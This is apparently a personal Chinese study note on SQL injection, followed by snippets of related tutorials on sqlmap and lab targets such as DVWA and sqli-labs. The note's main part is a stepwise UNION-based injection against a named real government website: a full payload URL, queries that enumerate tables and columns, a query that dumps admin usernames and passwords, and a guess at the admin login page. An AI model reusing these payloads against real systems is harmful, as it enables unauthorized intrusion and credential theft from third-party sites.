sqlmap注入学习

http://www.rqyl.gov.cn/rqxw-d.php?ID=-153%20%20%20union%20select%201,database%28%29,3,4,user%28%29,6,7,8,9,10,11,12,13,14,15,16,17

database（）查看数据库

user（）查看当前用户

version（）查看数据库版本号

@@version_compile_os 查看服务器版本

查看数据库所有的表

union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=0x67313838343638

爆出admin表中的内容

union select group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=0x61646D696E

爆

爆破账户和密码

UNION SELECT 1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17 from admin

接下来我们猜下登录界面

admin.php

来自为知笔记(Wiz)

时间： 2024-12-12 23:48:23

sqlmap注入学习的相关文章

SQL注入学习资料总结

转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html 什么是SQL注入 SQL注入基本介绍结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言.1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准.不过各种通行的数据库系统在其实践过程中都

小白注入学习:sqli-labs--less8学习记录

Less8 布尔型盲注: 1.布尔盲注网页代码仍然存在着SQL注入漏洞,但是当进行SQL注入时,页面不会回显任何数据,只会返回“right”或“wrong”即0和1. 需要通过构造SQL语句,来判断数据库信息的正确性,在通过页面的返回的“真”和“假”来识别判断是否正确,这就是布尔盲注. Less8中当SQL语句正确时,页面显示You are in...... 当SQL语句错误时,页面啥也不显示初步满足布尔型盲注的特点2.确定注入类型.方法 ?id=1' and 1=1 --+ 页面显示Yo

使用sqlmap注入DVWA的SQL Injection菜单

1 使用sqlmap注入DVWA的SQL Injection菜单本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用admin/password登陆系统,通过firebug工具获取cookie信息. 得到的cookie信息如下: security=low; path=/dvwa/; domain=192.168.0.112 PHPSESSID=0bec860709d15f590768b7713c69b52f; pa

Sqlmap注入Base64编码的注入点

不小心删了,找快照才找到的.补回来... 上次遇到一个Base64的注入点,手工注入太麻烦,于是在网上看了一下sqlmap Base64注入的方法,如下: sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称” 其中常用到的bypass脚本绕过SQLMAP主要两个脚本:space2ha

SQLMAP注入教程

/** * Author :xiaomiao * * 专注于互联网安全,网站开发 * * 如有问题,可以在新浪@苗_创 ***/1.SQLMAP用于Access数据库注入 (1)猜解是否能注入win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" Linux : ./sqlmap.py -u "http://www.stronkin.com/en/CompHon

sqlmap注入小结

sqlmap注入时: 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断 3.基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中 4.联合查询注入,可以使用union的情况下的注入 5.堆查询

在windows系统和kali中通过sqlmap注入

第1章在windows系统中通过sqlmap注入 1.1 环境搭建 Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux, 由于sqlmap是基于Python编写,所以需要在系统中先安装好2.7.x版本的Python,然后将下载好的sqlmap放在Python2.7目录下,这里Python安装我就不一一截图了,因为都是使用默认安装,只是安装的时候根据需要可以修改下安装路径. 在Windows下首先把下载好的sqlmap放在Python路径下然后我

sqlmap的学习之路-自动化测试SQL注入工具

sqlmap 自动化测试sql 注入问题会返回版本信息等等. Sqlmap是开源的自动化SQL注入工具,由Python写成,因此运行需要安装python环境. 如需了解更多sqlmap资料可以访问官方http://sqlmap.org/,https://github.com/sqlmapproject/sqlmap,https://www.python.org . 注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点. 特点:

sqlmap深入学习

整理下关于sql注入的资料链接学习链接: part1:http://www.freebuf.com/sectool/77948.html part2:http://www.freebuf.com/sectool/86886.html http://www.2cto.com/article/201608/541493.html http://pnig0s1992.blog.51cto.com/393390/402775 http://blog.sina.com.cn/s/blog_72cbda3